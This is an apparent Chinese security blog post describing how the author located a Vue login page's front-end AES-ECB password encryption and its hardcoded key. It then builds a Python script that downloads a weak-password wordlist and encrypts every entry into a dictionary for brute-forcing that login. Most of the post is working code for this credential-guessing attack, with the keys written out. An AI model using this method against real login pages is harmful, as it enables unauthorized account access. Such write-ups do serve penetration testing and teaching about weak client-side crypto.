记一次简单的寻找前端加密爆破的逻辑过程

过程比较简单,属于一篇水文。主要参考这篇文章中的第三种方法。

前端使用vue写的,把前端代码复制出来
Alt text

找到登陆那点的触发函数
Alt text

找到提交函数中密码变量
Alt text

全局搜索即可定位到加密逻辑,并且找到加密用的密钥
Alt text

通过注释可以发现是AES加密
Alt text

查看代码变量可以看出是AES-ECB

1
2
3
4
5
6
7
const encrypt=(word, keyStr)=>{
keyStr = keyStr ? keyStr : 'abcdefgabcdefg12';
let key = CryptoJS.enc.Utf8.parse(keyStr);//Latin1 w8m31+Yy/Nw6thPsMpO5fg==
let srcs = CryptoJS.enc.Utf8.parse(word);
let encrypted = CryptoJS.AES.encrypt(srcs, key, {mode:CryptoJS.mode.ECB,padding: CryptoJS.pad.Pkcs7});
return encrypted.toString();
};

从网上找个python版的AES-ECB脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from Crypto.Cipher import AES
import os
from Crypto import Random
import base64

class AESUtil:

__BLOCK_SIZE_16 = BLOCK_SIZE_16 = AES.block_size

@staticmethod
def encryt(str, key):
cipher = AES.new(key, AES.MODE_ECB)
x = AESUtil.__BLOCK_SIZE_16 - (len(str) % AESUtil.__BLOCK_SIZE_16)
if x != 0:
str = str + chr(x)*x
msg = cipher.encrypt(str)
msg = base64.urlsafe_b64encode(msg).replace('=', '')
return msg

@staticmethod
def decrypt(enStr, key):
cipher = AES.new(key, AES.MODE_ECB)
enStr += (len(enStr) % 4)*"="
decryptByts = base64.urlsafe_b64decode(enStr)
msg = cipher.decrypt(decryptByts)
paddingLen = ord(msg[len(msg)-1])
return msg[0:-paddingLen]

if __name__ == "__main__":
key = "G20PAA&9-EEFPQ5T"
print AESUtil.encryt("123456", key)

将跑出来的脚本和提交的对比,发现提交的有padding。
Alt text
Alt text

稍微修改一下代码逻辑,从github上下弱口令字典生成加密字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
from Crypto.Cipher import AES
import os
from Crypto import Random
import base64

class AESUtil:

__BLOCK_SIZE_16 = BLOCK_SIZE_16 = AES.block_size

@staticmethod
def encryt(str, key):
cipher = AES.new(key, AES.MODE_ECB)
x = AESUtil.__BLOCK_SIZE_16 - (len(str) % AESUtil.__BLOCK_SIZE_16)
if x != 0:
str = str + chr(x)*x
msg = cipher.encrypt(str)
msg = base64.urlsafe_b64encode(msg)
return msg

@staticmethod
def decrypt(enStr, key):
cipher = AES.new(key, AES.MODE_ECB)
enStr += (len(enStr) % 4)*"="
decryptByts = base64.urlsafe_b64decode(enStr)
msg = cipher.decrypt(decryptByts)
paddingLen = ord(msg[len(msg)-1])
return msg[0:-paddingLen]

if __name__ == "__main__":
resp = requests.get(url="https://raw.githubusercontent.com/TheKingOfDuck/fuzzDicts/master/passwordDict/top1000.txt")
passwd_list = resp.content.split('\n')
key = "G20PAA&9-EEFPQ5T"
with open('./top1000en.txt', 'a+') as f:
for i in passwd_list:
f.write(AESUtil.encryt(i, key) + '\n')
print AESUtil.encryt("123456", key)
You need to set install_url to use ShareThis. Please set it in _config.yml.
You forgot to set the business or currency_code for Paypal. Please set it in _config.yml.

Comments

You forgot to set the shortname for Disqus. Please set it in _config.yml.